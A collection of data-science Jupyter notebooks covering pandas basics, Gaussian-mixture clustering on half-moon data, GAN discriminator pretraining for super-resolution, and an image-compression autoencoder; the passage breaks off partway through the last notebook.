it to get a better idea of what the data looks like. plt.scatter(data.Population, data.Profit) # That's it! Thanks for reading. In Exercise 2 we'll take a look at logistic regression for classification problems.
public/forkable/linear-regression.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 3 # name: python3 # --- # + [markdown] id="view-in-github" colab_type="text" # <a href="https://colab.research.google.com/github/aryadeo/pandas/blob/master/pandas.ipynb" target="_parent"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"/></a> # + [markdown] id="oWp2L0uvrzK0" colab_type="text" # #Basics of Pandas # ![Pandas Logo](https://drive.google.com/uc?id=1fn6w_q1O1jvFWQB6JlDQVKa6KG7_BG5A) # + [markdown] id="nMQemGcautwr" colab_type="text" # Date: 12/11/2019 # # pandas has two primary data structure. # 1. Series(for 1D data) # 2. DataFrame(for 2D data) # # Data Processing can be done in three ways. # 1. Data munging and cleaning # 2. Analyzing and modelling the data # 3. Organizing for sulitable ploting and visualization # + id="4TKcZIJqpuaJ" colab_type="code" colab={} # !pip install pandas # + id="4GF8fVx_u-UK" colab_type="code" colab={} import numpy as np import pandas as pd import matplotlib.pyplot as plt import seaborn as sns sns.set() # + [markdown] id="7zq83tLTwOxL" colab_type="text" # #Data Structure # # + [markdown] id="dOuBgmNNxoTK" colab_type="text" # ##Series-1D # # + [markdown] id="B88kpMmAYMK9" colab_type="text" # A series can be buit from # # # * np array # * dictionary # * scalar # + id="eTmXWCsqzQZl" colab_type="code" outputId="323a14b1-1b97-4cbb-95df-57fc1a13e2f8" colab={"base_uri": "https://localhost:8080/", "height": 212} #series created with auto indexing s_test_1=pd.Series(np.random.rand(10)) s_test_1 # + id="-ojFfbi6wB99" colab_type="code" outputId="66a246ac-81b8-488a-8e93-21166c297ed1" colab={"base_uri": "https://localhost:8080/", "height": 212} #series from numpy with defined indices s_test_2=pd.Series(np.random.randn(10), index=list('ABCDEFGHIJ')) s_test_2 # + id="lh_raQRpx-KA" colab_type="code" outputId="952ae996-100b-41c6-8b9a-cce7985b92ea" colab={"base_uri": "https://localhost:8080/", "height": 123} #series from scalar with defined indices s_test_3=pd.Series(55.55,index=[m for m in range(5)]) s_test_3 # + id="3iU_KpZY0QZF" colab_type="code" outputId="02d46075-b90e-45bd-836a-e72bbb2248a3" colab={"base_uri": "https://localhost:8080/", "height": 70} #Series in dict form s_test_4=pd.Series({'a':1,'b':2}) s_test_4 # + [markdown] id="UgRhPrSE1rFl" colab_type="text" # operations in a series # # + id="RqtCQwL81H9t" colab_type="code" outputId="736604ee-9779-4502-f729-454eeee53d6b" colab={"base_uri": "https://localhost:8080/", "height": 70} print(s_test_1.index) print(s_test_2.index) print(s_test_3.index) #it can be seen that auto indexing and defined indices are printed in different ways. # + id="_ZOHEKcq2TeM" colab_type="code" outputId="76694d81-bf94-4323-e477-acf120b6cc36" colab={"base_uri": "https://localhost:8080/", "height": 621} #series is similar to nD array/numpy array print(s_test_1[0]) print(s_test_1[2:]) print(s_test_1[:5]) print(s_test_1[:]) print(s_test_1[s_test_1 > s_test_1.mean()]) # + id="D9J8V9Xm2yDe" colab_type="code" outputId="d862fc07-5838-49aa-cac0-2f4f7394f403" colab={"base_uri": "https://localhost:8080/", "height": 34} #to know the datatype of a series s_test_1.dtype # + id="hJE8q9Sp3MZ9" colab_type="code" outputId="96e8e687-5c8a-4a94-cf37-112844d1314c" colab={"base_uri": "https://localhost:8080/", "height": 52} #converting series to array----should be approached everytime s_test_1.to_numpy() # + id="ECD3EMIk5PcO" colab_type="code" outputId="e601e27c-6ebd-4a1f-877d-58dd211b287b" colab={"base_uri": "https://localhost:8080/", "height": 123} #alternative way to get the array backing the series s_test_1.array # + id="XOW5Gdf68bdR" colab_type="code" outputId="43679dc3-b7b7-488d-8f22-7ae9435d0faa" colab={"base_uri": "https://localhost:8080/", "height": 212} s_test_1+s_test_1 # + id="oyDNPs1G8foA" colab_type="code" outputId="f696329a-fdbe-41d8-bd02-2525384d395e" colab={"base_uri": "https://localhost:8080/", "height": 212} np.exp(s_test_1) # + id="PdmnfdPE5uzv" colab_type="code" outputId="7624ec8e-6cf9-4f05-f422-adbfcb3cc91d" colab={"base_uri": "https://localhost:8080/", "height": 105} #dictionary operation in series print(s_test_2['B']) print(s_test_2['C']) print('K'in s_test_2) print('F'in s_test_2) print(s_test_2['D']) # + id="_9ZGpdnm6FCO" colab_type="code" colab={} #giving a name to the series s_test_1.name='XYZ' # + id="1VvwzPXdDF5I" colab_type="code" outputId="36e7bcda-3407-4ba7-b158-a00998ef1a01" colab={"base_uri": "https://localhost:8080/", "height": 34} print(s_test_1.name) # + id="L82Z6NhEDJzR" colab_type="code" colab={} s_test_1_new=s_test_1.rename('ABC') # + id="9tA4TBldEDUy" colab_type="code" outputId="3c6575e0-7915-4b59-d98b-153f0449cbaa" colab={"base_uri": "https://localhost:8080/", "height": 212} s_test_1_new # + id="qq67goPCEPzz" colab_type="code" outputId="bc140033-de0d-44fe-a88b-2f6962a21aa6" colab={"base_uri": "https://localhost:8080/", "height": 212} s_test_1 # + [markdown] id="FZ4w4DqlMObf" colab_type="text" # ##Data Frame # + [markdown] id="YobKCymwKrx_" colab_type="text" # Data Frames are 2D data structure with columns are f different/same datatypes. # It takes data in the form of dictionary/ array of numbers/ series/ another data frame. # + [markdown] id="6PRc2G1mY6V3" colab_type="text" # ###From dict of series # + id="25kSS7QfEo9j" colab_type="code" outputId="4dc429d3-b0aa-4945-efae-c424fb751b4c" colab={"base_uri": "https://localhost:8080/", "height": 283} #the dataframe creates NaN for indices not defined in a series. test_data={'one': pd.Series([10.,9,3,2],index=['a','b','c','d']), 'two':pd.Series(np.random.rand(10),index=[m for m in range(10)])} df_test=pd.DataFrame(test_data) print(df_test) #here you can see that for a,b,c,d indices the second column is NaN and for remaning indices the first column is showing NaN. # + id="OsdjaFfQs3fQ" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 212} outputId="c1e05e33-fc5e-4159-a2c7-34d3b5a472d6" test_data_1={'A': pd.Series(np.random.rand(10),index=[m for m in range(10)]), 'B': pd.Series([1,2,3,4,5,6,7,8,9,10])} df_test_1=pd.DataFrame(test_data_1) print(df_test_1) # + [markdown] id="KyazonQSZKZV" colab_type="text" # ###From dict of array # + id="sMSu6BPDNqIP" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 123} outputId="6b296c68-5247-4aad-8fe2-d621e46e7824" test_data_2={'column_1':[11.,22.,33.,44.,55.], 'column_2':[1.,2.,3.,4.,5.]} df_test_2=pd.DataFrame(test_data_2) print(df_test_2) # + id="uiVL7vOFPP30" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 197} outputId="61b570ec-06af-415b-e0a1-8983317926f4" #this data frame has no index. We can inser index to every row. pd.DataFrame(df_test_2,index=['a','b','c','d','e']) #Here it is searching for the given index in an already stored dataframe df_test_2 # + id="Gw4CotWbQDDD" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 167} outputId="863b315c-ff60-4c8f-9582-718f80d20b82" #Now lets check the same external indexing by without storing a dataframe into a variable. d = {'one': [1., 2., 3., 4.], 'two': [4, 30, 2, 1]} pd.DataFrame(d) # + id="DozlYretQ23d" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 167} outputId="1a3928cd-9073-4de8-e9e3-61073d3ab255" pd.DataFrame(d, index=['a', 'b', 'c', 'd']) #it can be seen that as the dataframe is not stored to a variable, it index names are getting changed. # + [markdown] id="D9g118YvZPil" colab_type="text" # ###From list of dicts # + id="NKYnjK3tQ7Ld" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 107} outputId="2d8267d1-4608-458b-813b-0385e46c3f9e" test_list=[{'one':1,'two':2,'three':3},{'a':4,'b':5,'one':10}] pd.DataFrame(test_list) # + [markdown] id="R3gojoVRlZsC" colab_type="text" # ###other operations # + id="ZSpT_f2LZ9Sd" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 70} outputId="712666c8-74df-4962-dce7-961552f61463" #adding index to te dataframe df_test_3=pd.DataFrame(test_list,index=['first set','second set']) print(df_test_3) # + id="PlyZJgF3afJc" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 107} outputId="8bd0ff74-93eb-4c26-ace3-097997392418" #to extract a particular column pd.DataFrame(test_list,columns=['one','two']) # + id="8QSxSiuwa4qN" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 52} outputId="79c1a8f6-703b-44c1-93c6-380df2e72eec" #extracting a particular index and columns in a dataframe. print(df_test_3[:1]['one']) # + id="mfyXaC2AbH5z" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 70} outputId="1bdfd0c0-988c-4e0f-f232-0e54efc735d0" #deleting and popping up del df_test_3['one'] print(df_test_3) # + id="nHedxzyFmSlT" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 70} outputId="b2fca268-bcf0-4213-db0a-4ea805577a2f" #deleting and popping up df_test_3.pop('b') print(df_test_3) # + id="__DBCM3Qmw1u" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 70} outputId="ed70ea8c-2b1b-48d8-f1b4-db741adf24e8" #When inserting a scalar value, it will naturally be propagated to fill the column: df_test_3['new_column']='any scalar value' print(df_test_3) # + [markdown] id="9U1kptiQoV9F" colab_type="text" # by default new column will be inserted to the end of the dataframe. But by using 'insert' command we can insert a column at any position in a dataframe. # + id="CsbmmeYSniDC" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 70} outputId="c1579652-9016-4710-ef1d-7f8fc9231bad" df_test_3['n_c_1']=df_test_3['two'] print(df_test_3) #here we are adding a new column to the existing dataframe with values copied from the 'two' column. # + id="_Pux1IvOo1B0" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 70} outputId="a4272f9d-5097-4991-ad18-239a922df429" df_test_3.insert(3,'inserted_column',[300,400]) print(df_test_3) # + [markdown] id="zSxHNC-tyuv1" colab_type="text" # ###creating a dataframe from a date range # # + id="76VBpSPUys69" colab_type="code" colab={} test_data_3=pd.date_range(start='20190101',end='20190130') df_test_4=pd.DataFrame(np.random.rand(30,4),index=test_data_3,columns=list('ABCD')) # + id="XKgeUeH3zBwd" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 567} outputId="92df614b-0154-4b62-8245-42a5200fa1db" print(df_test_4) # + [markdown] id="2IJ5m768NHO2" colab_type="text" # ###observation # + id="1Tc7zAOhzEod" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 197} outputId="d2283a4d-3b71-4ad6-ab61-61786e99cc49" df_test_4.head() # + id="v7jtWKaI8a2e" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 197} outputId="f344b262-2f36-4ebf-8ec9-b691678ca361" df_test_4.tail() # + id="QvWhrXFX8jDd" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 176} outputId="344d24cd-b391-4f4d-f102-33ee03410b8b" df_test_4.index # + id="E9zZvg1o8uzd" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 34} outputId="623a3b48-e045-4af7-9038-81d71eee474d" df_test_4.columns # + id="UOwyLOk99EEt" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 287} outputId="dd7d3663-e0f6-465e-a615-759e288acd05" df_test_4.describe()#### million dolar command # + id="wDaKifEN9rGQ" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 204} outputId="94477bfc-bd5b-4f6e-f46d-d2eb33377c63" #transposing the dataframe df_test_4.T # + id="ZljkaqhvAWH9" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 34} outputId="6641fa88-8aed-4bb1-b24a-cf210129699e" df_test_4['A'].mean() # + [markdown] id="Mu2GRNt3HfSG" colab_type="text" # ###Bolean operationa nd grouping # + id="uB11R3FuE-9d" colab_type="code" colab={} df_test_4 [df_test_4.A > 0.5] # + id="j7moz2_2GGFt" colab_type="code" colab={} df_test_4['boolean']=df_test_4['A']>0.5 # + id="nfyBGSYpGops" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 947} outputId="5c57d0cb-e62b-43a9-99cc-e88e4bbfefff" df_test_4 # + id="YCHAtpEPHai8" colab_type="code" colab={} g=df_test_4.groupby(['boolean']) # + id="ga8MQvKGHsM9" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 621} outputId="c288cccd-7fc0-4308-f8b9-732ef859b6c9" #here there are two objects #1. key #2. <DataFrame_name>_key for key,df_test_4_key in g: print(key) print(df_test_4_key)
pandas.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 3 # language: python # name: python3 # --- # # Watch Me Code 1: Pandas Basics # # - Series # - DataFrame # - Select columns, Select rows with Boolean indexing # import pandas as pd fruits = pd.Series(['Apple', 'Banana', 'Cherry', 'Orange', 'Pear'], name = "Fruit") fruits qtys = pd.Series([5,7,2,9,4]) qtys # dictionary of Series inventory = pd.DataFrame({ 'Fruit' : fruits, 'Qty' : qtys, 'Price': [2.99,1.99,3.99,2.99,1.49] }) inventory # column selection inventory['Fruit'] # as DataFrame inventory[ ['Fruit'] ] #two columns in the list inventory[ ['Fruit','Price'] ] # Boolean index inventory['Qty'] >5 # applying a boolean index to a dataframe inventory[ inventory['Qty'] >5 ] #combining columns and filters fruit_and_price_over5 = inventory[['Fruit','Price']][inventory['Qty'] >5 ] fruit_and_price_over5 # Confused? Too hot to handle??? Use variables! large_qty = inventory[ inventory['Qty'] >5 ] fruit_and_price_over5 = large_qty[ ['Fruit', 'Price' ] ] fruit_and_price_over5
lessons/12-pandas/WMC1-Pandas-Basics.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 3 # language: python # name: python3 # --- # # 4: Linearly Inseparable Datasets # # ## 4.1: The Non-Convex Regions # # ### Non-Convex Regions # # * What are non-convex regions? # # ### Linearly Inseparable Regions # # * What are linearly inseparable regions? # # Here is an image of linearly inseparable, non-convex regions that we would like to identify by clustering. # # # # Let us look at just the data points: # # <img src='https://s3.amazonaws.com/rfjh/media/CKEditorImages/2017/06/19/4_almonds.png'/> # # <br/> # ## Exercise: # # Let us now create this dataset of 4 almonds using half-moons. # # - Create a dataframe, moon_df with the structure given the X, y. # # <table border="1" cellpadding="1" cellspacing="1" style="width:500px; float: left;"> # <tbody> # <tr> # <td>X_0</td> # <td>X_1</td> # <td>y</td> # </tr> # <tr> # <td>X[:,0]</td> # <td>X[:,1]</td> # <td>y</td> # </tr> # </tbody> # </table> # + from matplotlib import pyplot as plt from sklearn.datasets import make_moons import numpy as np import seaborn as sns import pandas as pd plt.rcParams['figure.figsize'] = (10.0, 8.0) # set default size of plots plt.rcParams['image.interpolation'] = 'nearest' plt.rcParams['image.cmap'] = 'gray' N_Samples = 1000 D = 2 K = 4 X, y = make_moons(n_samples = 2*N_Samples, noise=0.05, shuffle = False) x_vec, y_vec = make_moons(n_samples = 2*N_Samples, noise=0.08, shuffle = False) x_vec[:,0] += 2.5 y_vec += 2 X = np.concatenate((X, x_vec), axis=0) y = np.concatenate((y, y_vec), axis=0) moon_df = pd.DataFrame({'X_0':X[:,0], 'X_1':X[:,1], 'y':y}) g = sns.pairplot(x_vars="X_0", y_vars="X_1", hue="y", data = moon_df) g.fig.set_size_inches(14, 6) sns.despine() # - # # <br/><br/><br/> # ## 4.2: Linearly Inseparable Datasets # # Applying k-means to the dataset:We see that the k-means failed. Let us now try GMMs # # <img src='https://s3.amazonaws.com/rfjh/media/CKEditorImages/2017/06/19/k-means-moons.png'/> # # <br/> # ## Exercise: # # - Apply GMMs on the dataset and visualize the graph, g. # - Assign the cluster assignments of each data point to gmm_cluster column in the blob_df dataframe. # # + import matplotlib as mpl from matplotlib import pyplot as plt from sklearn.datasets import make_moons import numpy as np import seaborn as sns import pandas as pd from sklearn import datasets from sklearn import mixture from sklearn.mixture import GaussianMixture #Generate the half moon data-set (4-halfmoons) N_Samples = 1000 X, y = make_moons(n_samples = 2*N_Samples, noise=0.05, shuffle = False) x_vec, y_vec = make_moons(n_samples = 2*N_Samples, noise=0.08, shuffle = False) x_vec[:,0] += 2.5 y_vec += 2 X = np.concatenate((X, x_vec), axis=0) y = np.concatenate((y, y_vec), axis=0) #visualizing using seaborn library moon_df = pd.DataFrame({'X_0':X[:,0],'X_1':X[:,1], 'y':y}) mixture_model = GaussianMixture(n_components = 4, covariance_type = 'spherical') mixture_model.fit(X) moon_df['gmm_clus'] = mixture_model.predict(X) # Plot the clusters g = sns.pairplot(x_vars="X_0", y_vars="X_1", hue="gmm_clus", data = moon_df) g.fig.set_size_inches(14, 6) sns.despine() sns.plt.show()
4.0-linearly-inseparable-datasets_with_answers.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 3 # name: python3 # --- # + [markdown] id="view-in-github" colab_type="text" # <a href="https://colab.research.google.com/github/pvrancx/torch_isr/blob/master/colabs/pretrain_discriminator.ipynb" target="_parent"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"/></a> # + [markdown] id="rCdpwPag9iE_" colab_type="text" # Supervised pretraining of discriminator before use in GAN training # + id="6ozAJqcNeRrx" colab_type="code" colab={} # ! pip install pytorch-lightning # + id="qZc_XnWHeUGk" colab_type="code" colab={} % cd "/content" # ! git clone "https://github.com/pvrancx/torch_isr.git" % cd "/content/torch_isr" # ! git pull # + id="jBvRDqxJeXoa" colab_type="code" colab={} from pytorch_lightning import Trainer import torch from torch.utils.data import random_split, DataLoader from torchvision.transforms import transforms from pytorch_lightning.callbacks import ModelCheckpoint from pytorch_lightning.loggers import TensorBoardLogger from isr.datasets.bsd import load_bsd300 from isr.datasets.transforms import ChannelSelect from isr.datasets.isr import IsrDataset from isr.datasets.gan import DiscriminatorDataset from isr.models.srcnn import SrCnn, SubPixelSrCnn from isr.models.srresnet import SrResNet from isr.models.srgan import SrGan, Discriminator from super_resolve import super_resolve_ycbcr, super_resolve_rgb import os from PIL import Image from argparse import ArgumentParser import matplotlib.pyplot as plt # %matplotlib inline # + [markdown] id="L9gjhksa8VOj" colab_type="text" # Create ISR dataset # + id="4FexM12se7Wm" colab_type="code" colab={} bsd300_train = load_bsd300('../data', split='train', image_mode='RGB') train_transforms = transforms.Compose([ transforms.RandomHorizontalFlip(), transforms.RandomRotation(15), ]) isr_data = IsrDataset( bsd300_train, output_size=96, scale_factor=4, deterministic=False, base_image_transform=train_transforms, transform=transforms.ToTensor(), target_transform=transforms.ToTensor() ) # + [markdown] id="405cgEQi8L2m" colab_type="text" # Load trained ISR model and create dataset of real and fake images # + id="kZzZsGpigfLq" colab_type="code" colab={} generator = SrResNet.load_from_checkpoint('/content/torch_isr/trained_models/srresnet4x.ckpt') dataset = DiscriminatorDataset(isr_data, generator) # + id="G4E5NO2ijODx" colab_type="code" colab={} n_train = int(len(dataset) * 0.8) split = [n_train, len(dataset) - n_train] train_data, val_data = random_split(dataset, split) train_loader = DataLoader(train_data, shuffle=True, batch_size=32, num_workers=2) val_loader = DataLoader(val_data, shuffle=False, batch_size=32, num_workers=2) # + id="YqfsaSRkgoaT" colab_type="code" colab={} base_dir = '/content/discriminator' chkptdir_dir = os.path.join(base_dir, 'checkpoints') # !mkdir -p chkptdir_dir checkpoint_callback = ModelCheckpoint( filepath=chkptdir_dir, save_top_k=3, verbose=False, monitor='val_loss', mode='min' ) logger = TensorBoardLogger(base_dir, name="tb_logs") # + [markdown] id="CbHxXgYL9-rB" colab_type="text" # Create binary classifier # + id="FYVGjgEhijPD" colab_type="code" colab={} # get default arg settings parser = ArgumentParser() parser = Trainer.add_argparse_args(parser) parser = Discriminator.add_model_specific_args(parser) hparams = parser.parse_args([]) # customize settings hparams.img_shape = (96, 96) hparams.lr = 1e-4 hparams.in_channels = 3 hparams.max_epochs = 200 model = Discriminator(hparams) # + id="-K_qvYbjjCYF" colab_type="code" colab={} # %reload_ext tensorboard # %tensorboard --logdir "$base_dir" # + [markdown] id="uTrlqMzy83cP" colab_type="text" # Train discriminator as standard classifier to distinguish between real and fake images # + id="PuXYfiF3jE0W" colab_type="code" colab={} trainer = Trainer( max_epochs=200, logger=logger, log_gpu_memory='min_max', gpus=1, checkpoint_callback=checkpoint_callback ) trainer.fit( model, train_dataloader=train_loader, val_dataloaders=val_loader, ) # + [markdown] id="qX21bW7J9GbA" colab_type="text" # Try discriminator # + id="d6Fbtkzh4iRx" colab_type="code" colab={} img_lr, img_hr = isr_data[0] # + [markdown] id="01PJIO0P9KQk" colab_type="text" # Real image: # + id="Z9qbAE6P57Yz" colab_type="code" colab={} plt.imshow(img_hr.squeeze(0).permute([1,2,0])) # + [markdown] id="dm-0rHlz9MsS" colab_type="text" # Generated image: # + id="D2SCt-J86ZM3" colab_type="code" colab={} fake_img = generator(img_lr.unsqueeze(0)).detach() # + id="KoqLQGNg7BTG" colab_type="code" colab={} plt.imshow(fake_img.squeeze(0).permute([1,2,0])) # + [markdown] id="P-9INZhU9PBD" colab_type="text" # Test discriminator on both images # + id="i6y5QqrS7GHC" colab_type="code" colab={} model(img_hr.unsqueeze(0)) # + id="JaXhHa1O7SPG" colab_type="code" colab={} model(fake_img)
colabs/pretrain_discriminator.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 3 # language: python # name: python3 # --- # + _uuid="676f62ff4ce2df1e2108b1ba11f1c68cb55a245d" colab={} colab_type="code" id="xmSic0K37La8" ''' v0.1 This model preoduced a MSSSIM score of 0.86 on validation. In this we attempt to improve the model. ''' # + _uuid="08d96b04a7dbb3d82783b348aa0735ffd3e4ed41" colab={} colab_type="code" id="5GH93QhR7X1F" import os import cv2 import torch import numpy as np import pandas as pd from PIL import Image import torch.nn as nn from zipfile import ZipFile import torch.nn.functional as F from torchvision import transforms import torchvision.transforms.functional as TF import random from torch.utils.data import Dataset, DataLoader from torch.utils.data.sampler import SubsetRandomSampler import matplotlib.pyplot as plt import time # Ignore warnings import warnings warnings.filterwarnings("ignore") # from pydrive.auth import GoogleAuth # from pydrive.drive import GoogleDrive # from google.colab import auth # from oauth2client.client import GoogleCredentials # %matplotlib inline import torchvision import zipfile from IPython import display from torch.autograd import Function # !git clone https://github.com/jorge-pessoa/pytorch-msssim os.chdir('pytorch-msssim') # !python setup.py install os.chdir('../') import pytorch_msssim # + _uuid="911837df1b14b04e195bb7388a2f80f8a9f63a96" colab={} colab_type="code" id="XmPaI58b8pVH" class imgDataset(Dataset): def __init__(self,path = '../input',indices=None): self.files = [] for r, d, f in os.walk(path): for file in f: if '.png' in file: self.files.append(os.path.join(r, file)) if indices!=None: files2 = self.files self.files = [] for i in range(len(files2)): self.files.append(files2[i]) def __getitem__(self,idx): img = Image.open(self.files[idx]) return self.transform(img) def __len__(self): return len(self.files) def transform(self,img): if random.random()>0.3: angle = random.randint(-60, 60) img = TF.rotate(img,angle) width, height = img.size dw = 32 - (width%32) dh = 32 - (height%32) img = TF.pad(img,(dw,dh,0,0)) return TF.to_tensor(img) # + _uuid="3470fe9cbd73d8a07ff7231b36af75a57f8f9d8d" class SignFunction(Function): def __init__(self): super(SignFunction,self).__init__() @staticmethod def forward(ctx,input, is_training=True): if is_training: prob = input.new(input.size()).uniform_() x = input.clone() x[(1 - input) / 2 <= prob] = 1 x[(1 - input) / 2 > prob] = -1 return x else: return input.sign() @staticmethod def backward(ctx, grad_output): return grad_output, None class Sign(nn.Module): def __init__(self): super(Sign, self).__init__() def forward(self,x): return SignFunction.apply(x, self.training) class Binarizer(nn.Module): def __init__(self,in_channels,out_channels): super(Binarizer,self).__init__() self.sign = Sign() self.conv1 = nn.Conv2d(in_channels, out_channels,kernel_size=1,bias=False) def forward(self,x): x = self.conv1(x) x = F.tanh(x) return self.sign(x) # + _uuid="d0bbd381684eee172d207b957bf6ce291b6d53a2" colab={} colab_type="code" id="SrQK6be2sUxv" class autoencoder(nn.Module): def __init__(self): super(autoencoder,self).__init__() self.enc = nn.Sequential(nn.Conv2d(3,32,8,stride=4,padding=2), nn.ReLU(), nn.BatchNorm2d(32), nn.Conv2d(32,64,2,stride=2), nn.ReLU(), nn.BatchNorm2d(64), nn.Conv2d(64,128,2,stride=2,padding=0), nn.ReLU(), nn.BatchNorm2d(128), nn.Conv2d(128,128,3,stride=1,padding=1), nn.Sigmoid() ) self.dec = nn.Sequential(nn.ConvTranspose2d(128,64,8,stride=4, padding=2), nn.BatchNorm2d(64), nn.ReLU(), nn.ConvTranspose2d(64,32,2,2), nn.BatchNorm2d(32), nn.ReLU(), nn.ConvTranspose2d(32,3,2,2), # nn.BatchNorm2d(32), # nn.Conv2d(32,32,3,stride=1,padding=1), # nn.BatchNorm2d(32), # nn.ConvTranspose2d(32,3,2,2), # nn.Sigmoid() ) self.binarizer = Binarizer(128,128) def forward(self,x): x = self.enc(x) x = self.binarizer(x) # print(x.shape) x = self.dec(x) # x = (x+1)*255 # x.round_() return x # + _uuid="b1ca0abae2d2364af138671363c34de08e73c5c0" colab={} colab_type="code" id="b4O8zNLoQO6N" batch_size = 1 ds = imgDataset() validation_split = 0.1 shuffle_dataset = True random_seed= 42 # Creating data indices for training and validation splits: dataset_size = len(ds) indices = list(range(dataset_size)) split = int(np.floor(validation_split * dataset_size)) if shuffle_dataset : np.random.seed(random_seed) np.random.shuffle(indices) train_indices, val_indices = indices[split:], indices[:split] # Creating PT data samplers and loaders: train_sampler = SubsetRandomSampler(train_indices) validation_sampler = SubsetRandomSampler(val_indices) train_loader = torch.utils.data.DataLoader(ds,batch_size=batch_size,sampler=train_sampler) validation_loader = torch.utils.data.DataLoader(ds, batch_size=batch_size,sampler=validation_sampler) # + _uuid="666fb34df46ae73f3039e3abc2fe634819007366" colab={} colab_type="code" id="JYhYkshfQTv-" model=autoencoder().float() criterion = nn.SmoothL1Loss() msssim = None optimizer = torch.optim.Adam(model.parameters(), lr=0.001) exp_lr_scheduler = torch.optim.lr_scheduler.MultiStepLR(optimizer, milestones=[25,40,60], gamma=0.1) if torch.cuda.is_available(): model = model.cuda() # + _uuid="7b390b7b3bea92bf91a3414711f5c7cf677ebbee" colab={} colab_type="code" id="rDiqf5OmcF87" def train(epoch=1,model=None,optimizer=None,criterion=None,batch_size=None,history=None,train_loader=None,exp_lr_scheduler=None,validation_loader=None): while epoch<=stop_epoch: total_loss = 0 total_accuracy = 0 model.train() exp_lr_scheduler.step() print('Epoch: {}\tLR: {:.5f}'.format(epoch,exp_lr_scheduler.get_lr()[0])) for batch_idx, data in enumerate(train_loader): target = data if torch.cuda.is_available(): data = data.cuda() target = target.cuda() # forward output = model(data) # backward + optimize loss = criterion(output, target) optimizer.zero_grad() loss.backward() optimizer.step() # print statistics total_loss+=loss # print('Epoch: {} [{}/{} ({:.0f}%)]\tLoss: {:.5f}'.format(epoch, (batch_idx + 1) * len(data), len(train_indices),100*(batch_idx + 1)* len(data) / len(train_indices), loss)) print('Train Loss: \t'+str(total_loss*batch_size/len(train_indices))) vloss, vaccuracy = validate(model,criterion,validation_loader) history['train_losses'].append((total_loss*batch_size)/len(train_indices)) history['val_losses'].append((vloss*batch_size)/len(val_indices)) history['epoch_data'].append(epoch) # visualize() epoch=1+epoch # + _uuid="9d62a0399450dae6a267f901d2118bff4c1f84d7" colab={} colab_type="code" id="U-n88wFX-fGz" def validate(model,criterion,validation_loader): total_loss = 0 total_acc = 0 model.train() for batch_idx, data in enumerate(validation_loader): target = data if torch.cuda.is_available(): data = data.cuda() target = target.cuda() output = model(data) loss = criterion(output, target).item() # optimizer.zero_grad() # loss.backward() # optimizer.step() total_loss+=loss accuracy = 0 total_acc+=accuracy return total_loss,total_acc def visualize(history): plt.figure(figsize=(15,7)) plt.plot(history['epoch_data'], history['train_losses'],label="Train Loss {:.5f}".format(history['train_losses'][-1])) plt.plot(history['epoch_data'], history['val_losses'], label="Validation Loss {:.5f}".format(history['val_losses'][-1])) # plt.plot(history['epoch_data'], history['train_accuracy'],label="Train Accuracy {:.5f}".format(history['train_accuracy'][-1])) # plt.plot(history['epoch_data'], history['val_accuracy'], label="Validation Accuracy {:.5f}".format(history['val_accuracy'][-1])) display.clear_output(wait=False) plt.legend() plt.show() # + _uuid="9c261d696a43b35fbc370302367359f4869f3451" colab={"base_uri": "https://localhost:8080/", "height": 659} colab_type="code" id="15qwd35ecGAI" outputId="d00ba44e-84f1-4df7-f0e3-7d943c665265" history = { 'train_losses':[], 'val_losses' :[], 'epoch_data' : [] } stop_epoch = 31 start = time.time() train(model=model,optimizer=optimizer,criterion=criterion,batch_size=1,history=history,train_loader=train_loader,validation_loader=validation_loader,exp_lr_scheduler=exp_lr_scheduler) end = time.time() print(end-start) # + _uuid="63f61e3828ce38328c2dc0e7d42118f0ad03814f" visualize(history) # + _uuid="47a7019d642d074335e5deb3f93ff457d74a62d6" colab={} colab_type="code" id="KwqD8ABdcGWp" torch.save(model.state_dict(),'model101.pt') # + _uuid="340bb0fbd379f8785aecb407368fcd89108b5196" def save_checkpoint(state,filename): torch.save(state, filename) # + _uuid="a9131efecdeaec519b5f7dcdf9df5fb815baa068" save_checkpoint({ 'epoch': history['epoch_data'][-1] + 1, 'state_dict': model.state_dict(), 'optimizer' : optimizer.state_dict(), }, 'train_state101.tar') # + _uuid="0a1b9d8c98134a2db81330b8d45f7e0d6e3d14d2" # !ls # - # ## Performance Measurement # + _uuid="18d28a78688441f22105ccc5e539bca19f601ffc" def display_(x): if type(x) is tuple: img,out = x fig, axes = 